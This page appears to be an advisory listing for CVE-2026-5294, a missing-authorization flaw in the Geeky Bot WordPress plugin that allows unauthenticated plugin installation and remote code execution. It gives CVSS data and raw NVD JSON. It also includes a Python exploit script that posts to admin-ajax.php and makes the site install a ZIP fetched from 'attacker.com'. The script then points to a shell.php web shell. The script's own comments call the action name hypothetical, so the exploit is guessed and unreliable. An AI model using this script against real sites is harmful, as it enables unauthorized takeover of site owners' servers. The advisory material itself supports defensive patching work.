Security Vulnerability Report
中文
CVE-2026-5294 CVSS 9.8 CRITICAL

CVE-2026-5294

Published: 2026-05-05 04:16:19
Last Modified: 2026-05-05 19:08:20

Description

The Geeky Bot plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.2.2. This is due to a nopriv AJAX route allowing attacker-controlled model/function dispatch and reaching a plugin installer helper that downloads and unzips attacker-supplied ZIP files into wp-content/plugins/. This makes it possible for unauthenticated attackers to perform arbitrary plugin installation and achieve remote code execution.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Geeky Bot <= 1.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: WordPress Geeky Bot Plugin <= 1.2.2 - Unauthenticated RCE # Date: 2026-05-05 # Exploit Author: Analyst # Vendor Homepage: https://wordpress.org/ # Software Link: https://downloads.wordpress.org/plugin/geeky-bot.1.2.2.zip # Version: <= 1.2.2 # Tested on: WordPress 6.x def exploit(target_url, malicious_zip_url): """ Exploit the missing authorization vulnerability to install a malicious plugin. """ # The vulnerable AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload structure based on vulnerability description (model/function dispatch) # This simulates the 'nopriv' route that triggers the plugin installer helper payload = { 'action': 'geeky_bot_ajax_action', # Hypothetical action name based on plugin structure 'model': 'installer', # Target the installer helper 'function': 'install_plugin', # Function that handles download/unzip 'plugin_zip': malicious_zip_url # URL to the attacker-controlled ZIP file } try: print(f"[*] Sending payload to {ajax_url}...") response = requests.post(ajax_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if malicious plugin was installed.") print("[+] Try accessing: {}/wp-content/plugins/malicious-plugin/shell.php".format(target_url)) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with target URL zip_url = "http://attacker.com/bad.zip" # Replace with URL to malicious ZIP exploit(target, zip_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5294", "sourceIdentifier": "[email protected]", "published": "2026-05-05T04:16:19.470", "lastModified": "2026-05-05T19:08:20.090", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Geeky Bot plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.2.2. This is due to a nopriv AJAX route allowing attacker-controlled model/function dispatch and reaching a plugin installer helper that downloads and unzips attacker-supplied ZIP files into wp-content/plugins/. This makes it possible for unauthenticated attackers to perform arbitrary plugin installation and achieve remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3497169/geeky-bot", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a1817c58-e807-4ef2-a382-28ca2fd5239e?source=cve", "source": "[email protected]"}]}}